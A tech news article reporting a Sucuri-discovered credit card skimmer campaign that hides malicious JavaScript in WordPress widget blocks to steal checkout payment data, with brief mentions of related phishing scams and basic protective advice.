New Credit Card Skimmer Targets WordPress E-Commerce Checkout Pages
On January 12, cybersecurity researchers discovered a credit card skimmer campaign targeting WordPress based e-commerce sites, using malicious JavaScript malware, injecting in into the WordPress database, to steal customers’ payment information.
Cyberattacks are mounting, using sophisticated techniques to target personal customer data. Experts now are vocalizing the need to properly understand how malware operates – by exploiting system vulnerabilities or tricking users into granting access – that very same understanding is key to prevention.
Detecting Malicious JavaScript Code in WordPress
The new cyberattack identified by Sucuri (a GoDaddy-owned website security firm), embeds a malicious JavaScript code under the “widget block” option. The hidden placement makes it harder for traditional security tools to the malicious JavaScript detection. Once the malware is injected, the skimmer activates only on checkout pages.
When a customer accesses a payment page, malicious JavaScript can hijack payment fields or inject a fraudulent form mimicking legitimate processors like Stripe. The fake form captures sensitive information, including credit card numbers, CVV codes, expiration dates, and billing details, compromising users’ financial security.
Data Exfiltration and Encryption
The stolen data is Base64 encoded and further encrypted with AES-CBC encryption to evade malicious JavaScript detection. The encrypted data is then exfiltrated to attacker-controlled servers such as valhafather[.]xyz or fqbe23[.]xyz.
The attac malicious JavaScript attack on WordPress is part of a series of elaborate credit card skimming campaigns. In October last year, Sucuri reported a similar campaign where malicious JavaScript detected and generated fake forms or scraped payment data from legitimate fields. The malware, at the time, employed multiple encryption layers to hide the stolen information.
Threatening Landscape
While the malicious JavaScript WordPress scam is a big enough threat to online retailers, it’s part of a bigger wave of cyberattacks in evolution.
Researchers have also revealed a PayPal phishing scam where attackers send fraudulent emails appearing to come from PayPal.
Cybercriminals targeting Web3 cryptocurrency wallets are adopting what is known as transaction simulation spoofing – exploits wallet functionality that previews transactions – tricking victims into approving fraudulent transactions by displaying misleading details.
To protect WordPress e-commerce site from attacks and analyze malicious JavaScript scams, the customer must make sure to regularly update WordPress and plugins to spot security vulnerabilities.
Moreover, to install security plugins to check JavaScript for malicious code existence and block threats. Also, for more protection, to enable two-factor authentication (2FA) for admin logins and payment gateways.
The WordPress skimmer highlights the growing sophistications, filled with complexity, of online threats. What matters is to provide a strong security system and take proactive security measures in addition to keeping people updated about emerging cyber tactics. Data protection is not easy and there should be security systems that scan JavaScript for malicious code.
Will WordPress succeed at preventing further malicious attacks before losing customer trust?
Inside Telecom provides you with an extensive list of content covering all aspects of the tech industry. Keep an eye on our Cybersecuritysections to stay informed and up-to-date with our daily articles.